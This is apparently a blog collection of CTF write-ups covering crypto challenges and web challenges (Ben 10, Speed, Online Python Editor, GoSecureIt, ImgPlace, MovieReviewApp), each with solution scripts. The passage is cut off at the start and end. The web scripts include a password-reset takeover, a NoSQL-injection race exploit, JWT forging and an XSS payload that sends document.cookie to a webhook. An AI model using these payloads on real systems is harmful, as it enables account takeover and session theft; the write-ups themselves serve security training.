By looking at the end of stack it's easy to see that both the last and second to last entries have a factor of $pq$, with a simple gcd we can therefore recover $n$. Looking now at the second and third to last entries (which I'll call $s_2$ and $s_3$ respectively) we can see that: $s_2 = zp^2q^2 + 2cp^2q + 2cpq^2$ $s_3 = xp^2q^2 + yp^2q + ypq^2 + cp^2 + wpq + cq^2$

With some modular reduction (and a division): $v_2 := \frac{s_2 \pmod{n^2}}{n} = 2cp + 2cq$ $v_3 :\equiv c(p^2 + q^2) \pmod n$

Then since $(p + q)^2 \equiv p^2 + q^2 \pmod n$ we have: $a :\equiv 2^{-1}v_2 \pmod n \equiv c(p + q) \pmod n$ $b :\equiv a^2 \pmod n \equiv c^2\left(p^2 + q^2\right) \pmod n$

Finally we can recover $c$, and therefore $\phi(n)$ with: $c \equiv bv_3^{-1} \pmod n$ $\phi(n) = n - \left(ac^{-1} \pmod n\right) + 1$

from base64 import b64decode as bd
from math import gcd

ct = 0x7434d263623892ca660f4139c54ab02a8a14d87cd5c658fca9105f88f7ed5c888a744e949b716094c1d73fd8084eeaf72b23e97325829a69ca57a34e5e0b5272ddaf039bcc0aed2055968c8dfa7cd0373cca072c31123e6259659af03ce87b224bb7fdf13fb89b4ceb580d2d11524025ccb4f86560f3b006d99d86a63ab3aa5a
size = 69

stack = []
with open('output.txt', 'r') as f:
    f.readline(); f.readline()
    for _ in range(size):
        stack.append(int.from_bytes(bd(f.readline().rstrip())))

n = gcd(stack[-1], stack[-2])

v2 = stack[-2] % (n*n) // n
v3 = stack[-3] % n

a = v2 * pow(2, -1, n) % n
b = pow(a, 2, n)

c = b * pow(v3, -1, n) % n

phi = n - (a * pow(c, -1, n) % n) + 1

d = pow(65537, -1, phi)
m = pow(ct, d, n)

print('flag:', m.to_bytes(-(m.bit_length()//-8)).decode())

flag: :spoiler[KSUS{6465726976617469766573206172652061206e69636520747269636b}]

Srdnlen2025 | Confusion

Wed, 12 Mar 2025 00:00:00 GMT

Introduction

Confusion was a crypto CTF from Srdnlen CTF 2025.

#!/usr/bin/env python3

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import os

# Local imports
FLAG = os.getenv("FLAG", "srdnlen{REDACTED}").encode()

# Server encryption function
def encrypt(msg, key):
    pad_msg = pad(msg, 16)
    blocks = [os.urandom(16)] + [pad_msg[i:i + 16] for i in range(0, len(pad_msg), 16)]

    b = [blocks[0]]
    for i in range(len(blocks) - 1):
        tmp = AES.new(key, AES.MODE_ECB).encrypt(blocks[i + 1])
        b += [bytes(j ^ k for j, k in zip(tmp, blocks[i]))]

    c = [blocks[0]]
    for i in range(len(blocks) - 1):
        c += [AES.new(key, AES.MODE_ECB).decrypt(b[i + 1])]

    ct = [blocks[0]]
    for i in range(len(blocks) - 1):
        tmp = AES.new(key, AES.MODE_ECB).encrypt(c[i + 1])
        ct += [bytes(j ^ k for j, k in zip(tmp, c[i]))]

    return b"".join(ct)


KEY = os.urandom(32)

print("Let's try to make it confusing")
flag = encrypt(FLAG, KEY).hex()
print(f"|\n|    flag = {flag}")

while True:
    print("|\n|  ~ Want to encrypt something?")
    msg = bytes.fromhex(input("|\n|    > (hex) "))

    plaintext = pad(msg + FLAG, 16)
    ciphertext = encrypt(plaintext, KEY)

    print("|\n|  ~ Here is your encryption:")
    print(f"|\n|   {ciphertext.hex()}")

The challenge acts as an encryption oracle in 3 steps:

$\quad b_0 := R \\quad b_i := E(m_i) \oplus m_{i-1} \quad i \ge 1$
$\quad c_0 := R \\quad c_i := D(b_i) \quad i \ge 1$
$\quad ct_0 := R \\quad ct_i := E(c_i) \oplus c_{i-1} \quad i \ge 1$

Where $m$ is our input message, padded, split into blocks and prefixed with the random block $R$, meanwhile $D$ and $E$ are AES decryption and encryption. Notice how $ct_i = b_i \oplus c_{i-1}$ since $E(c_i) = E(D(b_i)) = b_i$.

Solution

Encryption utlity function:

# encrypt and return the nth block
def encrypt(r, msg: bytes, block: int = -1):
    r.sendlineafter(b'x) ', msg.hex().encode())
    r.recvuntil(b'n:\n|\n|   ')
    ct = bytes.fromhex(r.recvline().rstrip().decode())
    if 0 <= block < len(ct) // 16:
        return ct[16*block:16*(block + 1)]
    return ct

Since the flag is appended to the end of our input, we can recover the first block with a simple chosen-prefix ECB attack, which I'm doing using my library cryptils. With dec0 we can calculate a decryption of a 16 long bytestring of zeros, which I'll use to recover the rest of the flag:

def dec0(r):
    msg1 = os.urandom(16)
    enc_msg1 = encrypt(r, msg1, 1)
    msg2 = os.urandom(16)
    enc_msg2 = encrypt(r, msg2, 1)
    val = xor(enc_msg2, msg1)

    ct3 = encrypt(r, enc_msg1 + msg1 + msg2, 3)

    return xor(ct3, val)

Also notice how the second block the oracle gives us is a plain encryption of the first block of input.

Let's call the output of dec0 simply $D(0)$ and set $F_i$ to be the $i$th block of the flag, with $F_0$ being the random block at the start, we can write each block of the flag's ciphertext we received at the start as: $C_i := E(F_i) \oplus F_{i-1} \oplus D(E(F_{i-1}) \oplus F_{i-2})$

Let's take a look at the fourth block after asking the oracle to encrypt $\ F_0 \mid F_1 \mid D(0)$: $ct_3 = b_3 \oplus D(b_2) =E(D(0)) \oplus F_1 \oplus D(E(F_1) \oplus F_0) = F_1 \oplus D(E(F_1) \oplus F_0)$ $T := ct_3 \oplus C_2 = F_1 \oplus D(E(F_1) \oplus F_0) \oplus E(F_2) \oplus F_1 \oplus D(E(F_1) \oplus F_0) = E(F_2)$

Let's then generate a random block $V$ and ask for the encryption of $\ T \mid D(0) \mid V$: $ct_3 = b_3 \oplus D(b_2) = E(V) \oplus D(0) \oplus D(E(D(0)) \oplus T) = E(V) \oplus D(0) \oplus D(T) = E(V) \oplus D(0) \oplus D(E(F_2)) = E(V) \oplus D(0) \oplus F_2$

We know both $E(V)$ and $D(0)$ and can therefore recover $F_2$. The process can then be repeated for successive blocks:

def main():
    r = remote('confusion.challs.srdnlen.it', 1338) if args.REMOTE else process('./chall.py')

    r.recvuntil(b' = ')
    ct_flag = blockify(bytes.fromhex(r.recvline().rstrip().decode()))

    D0 = dec0(r)

    flag = chosen_prefix(lambda b: encrypt(r, b, 1), string.printable, length=16)
    curr, prev = flag, ct_flag[0]

    for i in range(2, len(ct_flag)):
        ct3 = encrypt(r, prev + curr + D0, 3)
        enc_next = xor(ct_flag[i], ct3)

        msg = os.urandom(16)
        enc_msg = encrypt(r, msg, 1)
        enc = encrypt(r, enc_next + D0 + msg, 3)

        prev = curr
        curr = xor(enc, xor(enc_msg, D0))

        flag += curr

    print('flag:', unpad(flag, 16).decode())

    r.close()

flag: :spoiler[srdnlen{I_h0p3_th15_Gl4ss_0f_M1rt0_w4rm3d_y0u_3n0ugh}]

Srdnlen2025 | Ben 10

Tue, 11 Mar 2025 00:00:00 GMT

Can you outsmart the system and reveal the flag?

Introduction

This is one of the webs of the 2025 italian championship cybercup first round, the ctf was made in january 2025, and I'm writing the writeups only so some information could be wrong or not complete.

The challenge is presented in a very clear and simple way, we have in front of us a login form and one to register, once logged in we see we are shown several photos of the different aliens of ben10.

When we try to click on each alien, it just opens another screen with details, until the last one hides information that only the admin can see.

From here I would say that a look at the code would not hurt.

Source

Analysing the code, we see that the admin is created at the same time as the user, so each user has their own randomly generated admin.

    admin_username = f"admin^{username}^{secrets.token_hex(5)}"
    admin_password = secrets.token_hex(8)

And as you can see, the admin username is associated with the user created.

    conn = sqlite3.connect(DATABASE)
    cursor = conn.cursor()
    cursor.execute("INSERT INTO users (username, password, admin_username) VALUES (?, ?, ?)",(username, password, admin_username))
    cursor.execute("INSERT INTO users (username, password, admin_username) VALUES (?, ?, ?)",(admin_username, admin_password, None))
    conn.commit()

So the first problem is to understand how to find the name of our admin. But fortunately, it's quite simple, because we see that it's simply inserted into a template, and therefore probably somewhere in the HTML when rendered.

return render_template('home.html', username=username, admin_username=admin_username, image_names=image_names)

{% extends "base.html" %}

{% block content %}
    <h1>Welcome, {{ username }}</h1>
    <h2>Do you like the aliens on my Omnitrix?</h2>

    <!-- secret admin username -->
    <div style="display:none;" id="admin_data">{{ admin_username }}</div>

    <div id="image-grid">
        {% for image_name in image_names %}
            <div>
                <img src="{{ url_for('static', filename='images/' + image_name + '.webp') }}" alt="{{ image_name }}"
                    onclick="window.location.href='/image/{{ image_name }}'" style="cursor:pointer;">
            </div>
        {% endfor %}
    </div>

    <a href="{{ url_for('logout') }}" style="margin-top: 20px; display: block;">Logout</a>
{% endblock %}

So the first problem is solved...

The second is to find out how to access the secret image, with the aim of logging in as admin. To do this, we go back to analysing the source code.

Among the various endpoints, we find /reset_password and /forgot_password.

The former allows us to generate a reset token to be used in /forgot_password to change the user's password.

@app.route('/reset_password', methods=['GET', 'POST'])
def reset_password():
    """Handle reset password request."""
    if request.method == 'POST':
        username = request.form['username']

        if username.startswith('admin'):
            flash("Admin users cannot request a reset token.", "error")
            return render_template('reset_password.html')

        if not get_user_by_username(username):
            flash("Username not found.", "error")
            return render_template('reset_password.html')

        reset_token = secrets.token_urlsafe(16)
        update_reset_token(username, reset_token)

        flash("Reset token generated!", "success")
        return render_template('reset_password.html', reset_token=reset_token)

    return render_template('reset_password.html')


@app.route('/forgot_password', methods=['GET', 'POST'])
def forgot_password():
    """Handle password reset."""
    if request.method == 'POST':
        username = request.form['username']
        reset_token = request.form['reset_token']
        new_password = request.form['new_password']
        confirm_password = request.form['confirm_password']

        if new_password != confirm_password:
            flash("Passwords do not match.", "error")
            return render_template('forgot_password.html', reset_token=reset_token)

        user = get_user_by_username(username)
        if not user:
            flash("User not found.", "error")
            return render_template('forgot_password.html', reset_token=reset_token)

        if not username.startswith('admin'):
            token = get_reset_token_for_user(username)
            if token and token[0] == reset_token:
                update_password(username, new_password)
                flash(f"Password reset successfully.", "success")
                return redirect(url_for('login'))
            else:
                flash("Invalid reset token for user.", "error")
        else:
            username = username.split('^')[1]
            token = get_reset_token_for_user(username)
            if token and token[0] == reset_token:
                update_password(request.form['username'], new_password)
                flash(f"Password reset successfully.", "success")
                return redirect(url_for('login'))
            else:
                flash("Invalid reset token for user.", "error")

    return render_template('forgot_password.html', reset_token=request.args.get('token'))

The problem here is on line 183, where instead of using username it uses request.form['username'], and this causes a big problem because now you can just use the normal user's token to reset the admin's password.

Solution

# filename: exploit.py

#!/usr/bin/python3
import random
import string

import requests
from bs4 import BeautifulSoup

BASE_URL = "http://localhost:5000/"

s = requests.Session()

def string_generator(length):
    return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))

def login(username, password):
    data = {
        "username": username,
        "password": password
    }
    r = s.post(f"{BASE_URL}/login", data=data)
    return r.status_code == 200

def register(username, password):
    data = {
        "username": username,
        "password": password
    }
    r = s.post(f"{BASE_URL}/register", data=data)
    return r.status_code == 200

def get_admin():
    r = s.get(BASE_URL)
    soup = BeautifulSoup(r.text, 'html.parser')
    admin_username = soup.find('div', {'id': 'admin_data'}).text.strip()
    print("[+] Admin Username:", admin_username)
    return admin_username

def get_reset_token(username):
    r = s.post(f"{BASE_URL}/reset_password",data={"username": username})
    soup = BeautifulSoup(r.text, 'html.parser')
    token = soup.find('strong').text.strip()
    return token

def exploit(username_admin,token):
    data = {
        "username": username_admin,
        "reset_token": token,
        "new_password": "cookieforme",
        "confirm_password": "cookieforme"
    }
    r = s.post(f"{BASE_URL}/forgot_password", data=data)
    if r.status_code == 200:
        print("[+] Generated new password!")
    else:
        print("[!] Failed to generate new password")
        return

    if login(username_admin, "cookieforme"):
        print("[+] Logged in as admin!")
    else:
        print("[!] Failed to login as admin")
        return

    return s.get(f"{BASE_URL}/image/ben10").text

def main():
    username = string_generator(10)
    password = string_generator(10)
    register(username, password)
    login(username, password)
    username_admin = get_admin()
    token = get_reset_token(username)
    print(exploit(username_admin,token))


if __name__ == "__main__":
	main()


# goodluck by @akiidjk

Srdnlen2025 | Speed

Tue, 11 Mar 2025 00:00:00 GMT

Introduction

For the second web challenge of srdnlen2025 we have a very interesting but not particularly complicated challenge.

The challenge is presented as a simple shop, so the goal is to buy the flag, which has a very high price. and we don't have enough money to buy the flag, which is particularly standard.

So we jump straight into the code and try to understand how it works.

Source

The application is a simple javascript application using express.js and express-handlebars for page rendering and a nosql database to manage the data (MongoDB with mongoose).

As soon as we log in, we notice that the only way to get money is with these codes, which are randomly generated once in the code and cannot be reused.

// filename: app.js
// Generate a random discount code
  const generateDiscountCode = () => {
      const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
      let discountCode = '';
      for (let i = 0; i < 12; i++) {
          discountCode += characters.charAt(Math.floor(Math.random() * characters.length));
      }
      return discountCode;
  };

    const createDiscountCodes = async () => {
        const discountCodes = [
            { discountCode: generateDiscountCode(), value: 20 }
        ];

        for (const code of discountCodes) {
            const existingCode = await DiscountCodes.findOne({ discountCode: code.discountCode });
            if (!existingCode) {
                await DiscountCodes.create(code);
                console.log(`Inserted discount code: ${code.discountCode}`);
            } else {
                console.log(`Discount code ${code.discountCode} already exists.`);
            }
        }
    };

    // Call function to insert discount codes
    await createDiscountCodes();

As you can see, everything is normal, nothing strange, something strange we have in the routes.js in the redeem endpoint.


let delay = 1.5;

router.get('/redeem', isAuth, async (req, res) => {
    try {
        const user = await User.findById(req.user.userId);

        if (!user) {
            return res.render('error', { Authenticated: true, message: 'User not found' });
        }

        // Now handle the DiscountCode (Gift Card)
        let { discountCode } = req.query;

        if (!discountCode) {
            return res.render('error', { Authenticated: true, message: 'Discount code is required!' });
        }

        const discount = await DiscountCodes.findOne({discountCode})

        if (!discount) {
            return res.render('error', { Authenticated: true, message: 'Invalid discount code!' });
        }

        // Check if the voucher has already been redeemed today
        const today = new Date();
        const lastRedemption = user.lastVoucherRedemption;

        if (lastRedemption) {
            const isSameDay = lastRedemption.getFullYear() === today.getFullYear() &&
                              lastRedemption.getMonth() === today.getMonth() &&
                              lastRedemption.getDate() === today.getDate();
            if (isSameDay) {
                return res.json({success: false, message: 'You have already redeemed your gift card today!' });
            }
        }

        // Apply the gift card value to the user's balance
        const { Balance } = await User.findById(req.user.userId).select('Balance');
        user.Balance = Balance + discount.value;
        // Introduce a slight delay to ensure proper logging of the transaction
        // and prevent potential database write collisions in high-load scenarios.
        new Promise(resolve => setTimeout(resolve, delay * 1000));
        user.lastVoucherRedemption = today;
        await user.save();

        return res.json({
            success: true,
            message: 'Gift card redeemed successfully! New Balance: ' + user.Balance // Send success message
        });

    } catch (error) {
        console.error('Error during gift card redemption:', error);
        return res.render('error', { Authenticated: true, message: 'Error redeeming gift card'});
    }
});

The first thing that stands out is


        const user = await User.findById(req.user.userId);

        if (!user) {
            return res.render('error', { Authenticated: true, message: 'User not found' });
        }

        // Now handle the DiscountCode (Gift Card)
        let { discountCode } = req.query;

        if (!discountCode) {
            return res.render('error', { Authenticated: true, message: 'Discount code is required!' });
        }

        const discount = await DiscountCodes.findOne({discountCode})

        if (!discount) {
            return res.render('error', { Authenticated: true, message: 'Invalid discount code!' });
        }

Where we can clearly see a very undisguised nosql injection where we just have to do discountCode = { $ne: null } to redeem the code without knowing the exact value.

But this only solves one of our problems, because when we check the code later we see that our code can only be used once, the code only gives 20 credits and we need 50 credits for the flag.

This is where the name of the challenge comes in, which gives a nice clue as to what to do next, speed == race condition.

Solution

In my case, I split the attack into two parts because I had problems doing the race condition in python, so I used curl and bash, but there may be a more elegant way to exploit the race condition.

# filename: exploit.py

import random
import string
import threading
import requests

# BASE_URL = "http://speed.challs.srdnlen.it:8082"
BASE_URL = "http://localhost:80"
s = requests.Session()

def string_generator(length):
    return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))

def redeem_code():
    try:
        r = s.get(BASE_URL + "/redeem?discountCode[$ne]=null")
        print(f"Response ({threading.current_thread().name}): {r.status_code} - {r.text}")
    except Exception as e:
        print(f"Error in thread {threading.current_thread().name}: {e}")

def login(username, password):
    s.post(BASE_URL + "/user-login", json={"username": username, "password": password})
    # print(f"Login response: {r.text}")
    return username, password

def register(username, password):
    s.post(BASE_URL + "/register-user", json={"username": username, "password": password})
    # print(f"Register response: {r.text}")
    return username, password

def main():
    username = string_generator(8)
    password = string_generator(8)
    register(username, password)
    login(username, password)

    print(s.cookies["jwt"].strip())
    # redeem_code()


if __name__ == "__main__":
    main()

#!/bin/bash

JWT="$(python3 exploit.py)"      # Read the jwt printed by exploit.py
echo "JWT used: $JWT"

for i in {1..30}; do
  curl -s 'http://localhost:80/redeem?discountCode%5B%24ne%5D=null' \
       -H "Cookie: jwt=${JWT}" &
done

wait

Once you have made a few attempts and the logs show that you have 60 credits, you can copy the jwt and use it to log in.

Trx2025 | Online Python Editor

Tue, 11 Mar 2025 00:00:00 GMT

Introduction

This is the first web in the TRX2025 CTF. And it's basically a simple online Python editor with a syntax checker.

Source

Go to the source code and we can immediately see two things:

In a file called secret.py, which is never called, read or otherwise used.
The main app.py file

# filename: app.py

import ast
import traceback
from flask import Flask, render_template, request

app = Flask(__name__)

@app.get("/")
def home():
    return render_template("index.html")

@app.post("/check")
def check():
    try:
        ast.parse(**request.json)
        return {"status": True, "error": None}
    except Exception:
        return {"status": False, "error": traceback.format_exc()}

if __name__ == '__main__':
    app.run(debug=True)

What happens is that the template is rendered and every N seconds the check method is called, which parses the Python code sent by the client and returns the traceback, which is very useful for us later.

Solution

Where's the vuln? Well, it's quite simple here: ast.parse(**request.json), The call to ast.parse is vulnerable to Python code injection, in fact we can pass arbitrary parameters to the function (because of the **request.json), and if we look at the documentation for ast.parse we know that we can pass a filename to the function, and ast.parse uses something like compile(source, filename, mode, PyCF_ONLY_AST), which allows us to leak sensitive information causing syntax errors in specific lines of code.

So finally we get

# filename: exploit.py

#!/usr/bin/python3
import requests

BASE_URL = "http://python.ctf.theromanxpl0.it:7001/"

def check():
    r = requests.post(BASE_URL + "/check", json={"source": "\n\n\n\n\n;","filename":"./secret.py", })
    if 'error' != None:
        print(r.json()['error'])
    else:
        print(r.json())

def main():
    check()


if __name__ == "__main__":
	main()


# goodluck by @akiidjk

flag: :spoiler[TRX{4ll_y0u_h4v3_t0_d0_1s_l00k_4t_th3_s0urc3_c0d3}]

M0lecon2025beginner | GoSecureIt

Mon, 23 Dec 2024 00:00:00 GMT

Introduction

We are faced with an application written in go, not very complex with several files, but already looking at the folder tree we see the secret folder with secret.go inside and this code

Source

// filename: secret.go
package secret

var JwtSecretKey = []byte("schrody_is_always_watching") // I don't know why it's called secret, I'll just leave it here :)

Obviously this is the cookie secret, but interacting with the web application there is not much to do, so it is worth checking other files, especially in Golang, when using the Gin framework it is often used to define routes in the main.go, in fact if we open it we can see

// filename: main.go
r.GET("/flag", handler.AuthMiddleware(), func(c *gin.Context) {
		role, _ := c.Get("role")
		if role == "admin" {
			c.String(http.StatusOK, os.Getenv("flag"))
		} else {
			c.String(http.StatusForbidden, "No flag for a normal user :/")
		}
	})

We can see that the role value is checked to see if it is admin, in which case the flag is printed, even though with c.GET it looks like it takes a get parameter it actually takes the value from the cookie we need to re-sign.

Solution

So to solve the challenge, all we have to do is modify the cookie we get when we log in by changing the role to admin and signing it with the leaked key.

# filename: exploit.py

#!/usr/bin/python3
import random
import string

import requests
import jwt

BASE_URL = "https://gosecureit.challs.m0lecon.it/"

s = requests.Session()

def string_generator(length):
    return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))

def sign_jwt(cookie,secret):
    decoded_jwt = jwt.decode(cookie, secret, algorithms=["HS256"])
    decoded_jwt['role'] = 'admin'
    resigned_jwt = jwt.encode(decoded_jwt, secret, algorithm='HS256')
    return resigned_jwt

def register(username,password):
    r = requests.post(BASE_URL + "register", data={"username": username, "password": password})
    if r.status_code != 200:
        print("[+] Failed to register")
        exit(1)
    else:
        print("[+] Registered successfully")

def login(username,password):
    r = requests.post(BASE_URL + "login", data={"username": username, "password": password})
    if r.status_code != 200:
        print("[+] Failed to login")
        exit(1)
    else:
        print("[+] Login successfully")

    return r.json()

def main():
    username,password = string_generator(10),string_generator(10)
    secret = "schrody_is_always_watching"
    register(username,password)
    cookies = login(username,password)
    new_jwt = sign_jwt(cookies['token'],secret)
    s.cookies.set('jwt', new_jwt)
    r = s.get(BASE_URL + "flag")
    print("Flag: " + r.text)

if __name__ == "__main__":
	main()

# goodluck by @akiidjk

flag: :spoiler[ptm{Th4t'5_why_1t'5_c4ll3d_53cr3t?}]

M0lecon2025beginner | ImgPlace

Mon, 23 Dec 2024 00:00:00 GMT

Introduction

We have a very simple application where we are allowed to register and log in and then we can upload images via url and associated description

Source

The source is only parsable by devtools from the browser, and we can see that in the pic.js file we have a function that sanitizes the image description

# filename: pic.js

"use strict";

(async () => {
    const picPhoto = document.getElementById("picPhoto");
    const picDesc = document.getElementById("picDesc");

    const r = await fetch("/api/pic/" + window.picId);

    if (r.ok) {
        const data = await r.json();
        picPhoto.src = data.src;

        // We need to block dangerous things!
        const blocklist = [
            "<comment",
            "<embed",
            "<link",
            "<listing",
            "<meta",
            "<noscript",
            "<object",
            "<plaintext",
            "<script",
            "<xmp",
            "<style",
            "<applet",
            "<iframe",
            "<img",
            "onload",
            "onblur",
            "onclick",
            "onerror",
            "href",
            "javascript",
            "window",
            "src",
        ];
        let description = String(data.description);
        blocklist.forEach((word) => {
            description = description.replace(word, "");
        });

        picDesc.innerHTML = description;
    } else {
        if (r.status == 401) {
            window.location.href = "/profile";
        } else {
            alert("Unable to load photo!");
        }
    }
})();

We can see this trivially from the code that takes ById elements are taken and the word is deleted.

Solution

There are really several solutions I used the simplest one which is to take advantage of the fact that the replace is case sensitive and no lowercase is done in the code to my description

# filename: exploit.py

#!/usr/bin/python3
import random
import string

import requests
from bs4 import BeautifulSoup

BASE_URL = "https://imgplace.challs.m0lecon.it"
URL_HOOK = "https://webhook.site/6a1df142-d272-4e11-8937-dbd81a33e9d2"

def string_generator(length):
    return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))

s = requests.Session()

def register(username, password):
    r = s.post(f"{BASE_URL}/register", data={"username": username, "password": password,"confirmPassword":password})

    if r.status_code != 200:
        print("[+] Error register")
        print(r.text)
        exit(1)
    else:
        print("[+] Register success")

def login(username, password):
    r = s.post(f"{BASE_URL}", data={"username": username, "password": password})
    if r.status_code != 200:
        print("[+] Error login")
        print(r.text)
        exit(1)
    else:
        print("[+] Login success")

def new(payload):
    r = s.post(f"{BASE_URL}/new", data={"url": URL_HOOK, "description": payload})
    if r.status_code != 200:
        print("[+] Error new image")
        print(r.text)
        exit(1)
    else:
        print("[+] New Image Success")


def main():
    username,password = string_generator(10),string_generator(10)
    print(f"Username: {username} Password : {password}")
    register(username,password)
    login(username,password)
    payload = "<ImG SrC=x OnError=fetch(`"+URL_HOOK+"?q=${document.cookie}`)>"
    new(payload=payload)
    print("[+] Done")
    print("[+] Now login to the website go to the image complete the captcha and you will get the flag on the webhook")


if __name__ == "__main__":
	main()

# goodluck by @akiidjk

flag: :spoiler[ptm{n3v3r_tRvST_t3g_bL0ckL1sts}]

M0lecon2025beginner | SmallAuth

Sat, 21 Dec 2024 00:00:00 GMT

Introduction

SmallAuth was a crypto CTF from m0leCon 2025 Beginner CTF organized by pwnthem0le.

from secret import flag, password
import signal
from Crypto.Util.number import (
    bytes_to_long,
    long_to_bytes,
    getRandomRange,
)
from hashlib import sha256
import os

p = 5270716116965698502689689671130781219142402682027195438035167686031865721400130496197382604002325978977917823871038888373085118354500422489134429970793096193438377786459821943518301475690713718745453633483219759953295608491564410082912515903134742148257215875373630412689071144760281744294536079770426517968527527493218935968663682019557492826204481612047410320146277333682801905360248457200458458982939490478875010628228329816347137904546340745621643293109290190631986349878770000332829974864263568375989597228583046155053640478805958492876860588535257030218304135983005840752161675722091031537527270835889607480661582626985375282908187505873350960702103509549729997875801557977556414403796543012974965425751833424162010931383924392626875437842811285456196644742198291857617009931030974156758885265756942730260677252867252555430773014258836269996233420470473918801854039549216620237517053340745984578639983387808534554731327
assert len(password) > 64

def timeout_handler(_1, _2):
    raise TimeoutError


class AuthProtocol:
    def __init__(self, password: bytes):
        super().__init__()
        self.p = p
        self.g = pow(bytes_to_long(password), 2, self.p)

    def gen_pub_key(self):
        self.a = getRandomRange(2, self.p)
        self.A = pow(self.g, self.a, self.p)
        return self.A

    def gen_shared_key(self, B):
        assert 1 < B < self.p
        k = pow(B, self.a, self.p)
        self.s = sha256(long_to_bytes(k)).digest()
        return self.s

    def confirm_key(self):
        signal.signal(signal.SIGALRM, timeout_handler)
        signal.alarm(5)
        try:
            challenge = input("Give me the challenge (hex): ").strip()
            challenge = bytes.fromhex(challenge.strip())
            (opad, ipad, challenge) = challenge[:16], challenge[16:32], challenge[32:]
            if challenge == sha256(opad + sha256(ipad + self.s).digest()).digest():
                pad = bytes([x^y for x, y in zip(ipad, opad)])
                print("Response:", sha256(pad + self.s).hexdigest())
            else:
                print("Mmm, cannot understand this challenge.")
        except TimeoutError:
            ipad = os.urandom(16)
            opad = os.urandom(16)
            print("\nI got bored waiting for your response.")
            print("I will start then.")
            print(
                f"Here is your challenge: {opad.hex()}{ipad.hex()}{sha256(opad + sha256(ipad + self.s).digest()).hexdigest()}"
            )
            response = input("Response? (hex): ")
            try:
                response = bytes.fromhex(response.strip())
                pad = bytes([x^y for x, y in zip(ipad, opad)])
                if response == sha256(pad + self.s).digest():
                    return True
                else:
                    print("Nope sorry.")
            except Exception as e:
                print("Ops, error")
        except Exception as e:
            print("Ops, error")
        return False


def main():
    print(
        "Welcome! Please authenticate to get the flag. You should know the password, right?"
    )
    auth = AuthProtocol(password)

    print("Here is my public key:", auth.gen_pub_key())
    B = int(input("Give me your public key: "))
    auth.gen_shared_key(B)

    if auth.confirm_key():
        print("Welcome!", flag)


if __name__ == "__main__":
    main()

The server simulates an authentication protocol: first it generates a secret shared key via a modified version of the Diffie-Hellman protocol where the generator isn't public, then we have a 5 second window where we can interact with the verifier to check our sent challenges, finally it asks for a "challenge" which should be constructed from a sha256 hash involving the previously generated key.

Solution

Without the generator it seems impossible to generate the secret key but a faulty check in gen_shared_key lets us generate it $50%$ of the time:

def gen_shared_key(self, B):
    assert 1 < B < self.p
    k = pow(B, self.a, self.p)
    self.s = sha256(long_to_bytes(k)).digest()
    return self.s

The assert wants to prevent values such as 0 and multiples of self.p, but allows self.p - 1, which once raised to the self.ath power will be 1, when self.a is even, or self.p - 1 when self.a is odd. We can therefore just guess one of the two possibilities and retry until we're right.

from pwn import *
from hashlib import sha256
from time import sleep


p = 5270716116965698502689689671130781219142402682027195438035167686031865721400130496197382604002325978977917823871038888373085118354500422489134429970793096193438377786459821943518301475690713718745453633483219759953295608491564410082912515903134742148257215875373630412689071144760281744294536079770426517968527527493218935968663682019557492826204481612047410320146277333682801905360248457200458458982939490478875010628228329816347137904546340745621643293109290190631986349878770000332829974864263568375989597228583046155053640478805958492876860588535257030218304135983005840752161675722091031537527270835889607480661582626985375282908187505873350960702103509549729997875801557977556414403796543012974965425751833424162010931383924392626875437842811285456196644742198291857617009931030974156758885265756942730260677252867252555430773014258836269996233420470473918801854039549216620237517053340745984578639983387808534554731327

def main():
    r = remote('smallauth.challs.m0lecon.it', 5102)

    r.recvuntil(b': ')
    A = int(r.recvline().rstrip().decode())

    B = p - 1
    r.sendlineafter(b': ', str(B).encode())

    s = sha256(b'\1').digest()

    sleep(5)

    r.recvuntil(b'challenge: ')
    challenge = bytes.fromhex(r.recvline().rstrip().decode())

    opad = challenge[:16]
    ipad = challenge[16:32]
    chal = challenge[32:]

    pad = bytes([x^y for x, y in zip(ipad, opad)])
    resp = sha256(pad + s).hexdigest()

    r.sendlineafter(b'): ', resp.encode())

    resp = r.recvline()
    r.close()

    if b'Nope' in resp:
        main()
    else:
        print('flag:', resp.rstrip().decode().split(' ')[1])


if __name__ == '__main__':
    main()

flag: :spoiler[ptm{y0u_4r3_a_j3d1_0f_pr0t0c0l5}]

IronCTF2024 | MovieReviewApp

Mon, 07 Oct 2024 00:00:00 GMT

Introduction

The challenge looks like a very simple site in pure html where we see reviews on movies

Source

Is not present the source BUT...

Solution

The first thing that stands out is that in the URL there are extensions, so we understand that probably the system behind it is not very complex, in fact, going to the root endpoint we notice

That directory listing is active and a .git folder exists

This allows us to see all the committed versions of the application

But I don't recommend to manually dump the whole folder so we rely on a very useful tool found on github GitTools

Using the dump script, we can dump the entire .git folder and then use the extractor tool to restore all the versions.

What we get is the source with all its versions.

Leaked source

# filename: app.py

from flask import Flask, render_template, request, redirect, url_for, flash, session
import psutil
import os
import platform
import subprocess
import re

app = Flask(__name__)
app.secret_key = os.urandom(32)

ADMIN_USERNAME = 'superadmin'
ADMIN_PASSWORD = 'Sup3rS3cR3TAdminP@ssw0rd$!'

@app.route('/')
def home():
    return render_template('index.html')

@app.route('/admin', methods=['GET', 'POST'])
def admin():
    if request.method == 'POST':
        username = request.form.get('username')
        password = request.form.get('password')
        if username == ADMIN_USERNAME and password == ADMIN_PASSWORD:
            session['logged_in'] = True
            return redirect(url_for('admin_panel'))
        else:
            flash("Invalid credentials. Please try again.")

    return render_template('login.html')

@app.route('/admin_panel', methods=['GET', 'POST'])
def admin_panel():
    if 'logged_in' not in session:
        return redirect(url_for('admin'))
    ping_result = None
    if request.method == 'POST':
        ip = request.form.get('ip')
        count = request.form.get('count', 1)
        try:
            count = int(count)
            ping_result = ping_ip(ip, count)
        except ValueError:
            flash("Count must be a valid integer")
        except Exception as e:
            flash(f"An error occurred: {e}")

    memory_info = psutil.virtual_memory()
    memory_usage = memory_info.percent
    total_memory = memory_info.total / (1024 ** 2)
    available_memory = memory_info.available / (1024 ** 2)

    return render_template('admin.html', ping_result=ping_result,
                           memory_usage=memory_usage, total_memory=total_memory,
                           available_memory=available_memory)


if __name__ == '__main__':
    app.run(debug=True)

We can see two interesting things: the first that stands out is that the admin's credentials are in the clear, and another is that we have another RCE to run.

Exploit

# filename: exploit.py

